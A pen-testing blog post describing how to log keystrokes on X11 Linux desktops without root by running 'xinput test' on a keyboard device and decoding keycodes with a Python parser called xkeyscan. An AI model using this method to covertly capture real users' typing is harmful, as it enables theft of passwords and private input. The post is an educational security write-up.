A colleague of mine, Sanjiv Kawa, came across a nifty technique for capturing the keystrokes of users on an X-based system. I encourage you to check out his post here, where Sanjiv walks through the process of using
xinput to find input devices and then sets up the keylogger for capture. It’s a particularly useful technique against those utilizing GNOME, KDE, or Xfce desktop environments, common on many *nix systems. It has the added bonus of not requiring root privileges to pull off.
For archival’s sake, the process boils down to:
xinput list- list potential input devices
- Find the XID of the keyboard to monitor
xinput test <XID>- display input from the device
XID is the “id” number associated with the desired keyboard input device. On my lab machine, this would be id 12:
Now, the output produced by
xinput test <XID> isn’t quite the final output we’re looking for. Instead of the characters typed by the user, the result is a series of keycodes. This is the output from typing “nano”:
How can these keycodes be translated to something more legible? Well, first we need the system’s device mapping of keycodes-to-keysyms, called a keymap. This is obtainable via
Notice how the keymap has multiple keysym columns for each keycode - this is due to modifiers (Shift, Alt, etc.) No modifier will return the keysym in the first column. The Shift modifier will return the keysym in the second column, and so on. More details about xmodmap and modifiers can be found here.
The next logical step is to leverage this keymap to automate the keycode-to-keysym conversion process.
What I ended up creating was a fairly simple Python script called “xkeyscan” which can be found here on GitHub.
I’ve built in some logic to account for modifier keys, such as Shift or Alt, so the parser will correctly determine things like case-sensitivity and special characters.
The script can be used a handful of ways depending upon how you’d prefer to feed data into it. For the following examples, data is stored to a file called
xkey.log using the following syntax:
xkeyscan can parse the file directly:
Or read from stdin:
Or parse in real-time:
Note the usage of python’s
-u switch on the last command. This disables python’s default buffer, allowing for data to be parsed as it’s streamed in. The switch is necessary for real-time parsing when tailing a log file, otherwise the data doesn’t get parsed until python’s buffer is flushed (for example with a CTL-C or CTL-D.)
Here’s the tool in action:
- Capturing is done in the right terminal (using
teeto verify output)
- Keystrokes being captured were performed in the top-left terminal
- xkeyscan is tailing and parsing xkey.log in the bottom-left terminal
In its current iteration, the xmodmap legend is statically set. If a system’s keymap differs, the codes array near the top of xkeyscan.py will need to be adjusted accordingly. My plan for v2 is for the script to take
xmodmap -pke as input and dynamically generate the appropriate codes. Could even take it a step further and create an all-in-one tool for finding the appropriate device, starting the keylogger, and printing out the parsed result. If you’d like to tackle these changes yourself, feel free to send a pull request!
linux pen-testing python scripting